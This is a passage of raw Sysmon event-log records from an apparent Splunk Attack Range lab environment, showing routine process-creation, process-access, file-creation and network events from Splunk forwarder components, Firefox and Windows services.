Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000298215Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:01.402{C8EA50B7-189D-6216-4C07-000000003802}6416C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000298214Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:01.114{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DDD746BD114275248D7DB4E26BD9765A,SHA256=D1AB836EA049C92E01C6D6AFB38D28A75262EB4E21818905BA5F99249A82A009,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000222145Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:58.561{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51696-false10.0.1.12-8000- 23542300x8000000000000000222147Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:02.685{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6BD8961A4F89B930BAB4ED615F73D01,SHA256=DCAFC67E09986BD1F286775966EFDB95FD69EECDAFC245E1EF5C33BF475E56BE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000298292Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:00.505{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49518-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000298291Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:00.190{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local61269- 23542300x8000000000000000298290Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:02.672{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298289Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:02.571{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01282D15984C03833F4DFACF117F4E31,SHA256=39C2A4E3EA987DDC86CE080408772272F26019B41F41B5911F687D4D04BC6498,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298288Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:02.571{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D92EE2AB562FB4BC110D24FE44FB429F,SHA256=BD98E05EA20F266B2EB126C90A6BC8B6810952CE313E9D1C1432DA20679BD70E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298287Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:02.557{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\surveyor-20220223083249-164MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000298286Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:02.293{C8EA50B7-189E-6216-4D07-000000003802}22401120C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000298285Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:02.156{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\social-tracking-protection-twitter-digest256.vlpsetMD5=B50CF628E0082A7840D84D0CBE1CAD48,SHA256=544DF79BCEF9DC8E082021E342C2A1B12CD0B8BDAF3687E0F23785406EDF33AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298284Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:02.156{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\social-tracking-protection-twitter-digest256.sbstoreMD5=F130C472E963FF3CEED251C65964B927,SHA256=E5D2A5BBE8AA43751EF7F7BC3A817A0963D56272A4C9B6055E60929606186CE2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298283Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:02.156{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\social-tracking-protection-linkedin-digest256.vlpsetMD5=5F93E0F827909390D257EBB27C77F392,SHA256=5BCB684F3EE3B2EC2F4945655FBEF281C487399D6BF90451647DB1761715D4C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298282Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:02.140{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\social-tracking-protection-linkedin-digest256.sbstoreMD5=9275B832091D9E3BFE50898A3BE022B5,SHA256=38C52A5435B625083000A054489B95E033F7B352377510DF668CEE749DE5803E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298281Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:02.140{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\social-tracking-protection-facebook-digest256.vlpsetMD5=8AC8A05028631170937EDA4CF0E0A35A,SHA256=456AB2C0E4E117D62DC529362EB22C725D410098868442729ADE5E4FF0822E78,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298280Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:02.140{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\social-tracking-protection-facebook-digest256.sbstoreMD5=7BBA9B83F0F213C5A723209D4C9962CE,SHA256=E1B8E7DEB0F34EEB6BF4D10E47E734A1FE829C365DF360B98646D7E11F2DD4C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298279Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:02.125{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\social-track-digest256.vlpsetMD5=16BF2AA546411BA25DC80EA288D47143,SHA256=524EC56C023155C7BE4C84D5AEC4FE2D85DFBAB3C2FA27F82BCD35028D546F83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298278Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:02.109{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\social-track-digest256.sbstoreMD5=69EE5B232870704AFCC0E8957AA42A0F,SHA256=EC8DF5279022B68C0B542EC1688889374754106DFADBF7CAF8337E3F98865941,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298277Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:02.094{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\mozstd-trackwhite-digest256.vlpsetMD5=83BCEF27E5B36115C2ADBA73CE9A7D2B,SHA256=3F68B0FEFBD484094D6517761B2DC13C6A430DDE3B44FA6CCACA3E39052D2AAD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000298276Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:02.094{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-189E-6216-4D07-000000003802}2240C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000298275Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:02.094{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\mozstd-trackwhite-digest256.sbstoreMD5=177BC07ECED26CEBE0441C318BD35BB8,SHA256=2A816C802C006DF75CA86E1497E4CF05DFB0F07DB0CD31C0EC30EDAF92C2DF75,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000298274Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:02.094{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298273Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:02.094{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298272Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:02.093{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298271Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:02.093{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000298270Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:02.093{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\mozplugin-block-digest256.vlpsetMD5=FCC9C2C9B611A3264B68EBE180EB4248,SHA256=6ECD378A537EEFE350B45CFA353741383F407D99D776BF23155A7825DC5DD2BC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000298269Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:02.092{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-189E-6216-4D07-000000003802}2240C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000298268Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:02.092{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-189E-6216-4D07-000000003802}2240C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000298267Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:02.090{C8EA50B7-189E-6216-4D07-000000003802}2240C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000298266Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:02.090{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\mozplugin-block-digest256.sbstoreMD5=519BEB1B01FC355BB388F1F75BE997FD,SHA256=FFE2D3077B81AE6F51B220C1C661B276C823FA67DAD1D64FC5F17249FC54BDC0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298265Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:02.072{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\google4\goog-unwanted-proto.vlpsetMD5=26429A3FEB2B0A865EB9D28822116E77,SHA256=7DC44408F381C6EE5F16E9A1CA2C3858C4171D1B6F4A7AAAA777260C617A8AB0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298264Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:02.072{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\google4\goog-unwanted-proto.metadataMD5=7BB120DDFF6C265E7941DC916367E2D1,SHA256=1E5688668A0D3F820F679B2E8331A5CDFF73ED890BA3F8CC2B23079BD014CD2E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298263Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:02.072{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\google4\goog-phish-proto.vlpsetMD5=1B042129522681508B7B3F8788E678DA,SHA256=6633127016E2D0F27C8F4759BA343633B1688883CA73A40B8ED8A46EE8C320C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222148Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:03.700{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F30F43F4C9E08E1096ED560EC921C5A9,SHA256=0D918DA446F1D72105853C0D0B20B84D624C90B8BB60B0B077846B1AB8ED7A4C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000298301Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:03.725{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-189F-6216-4E07-000000003802}5292C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298300Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:03.725{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298299Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 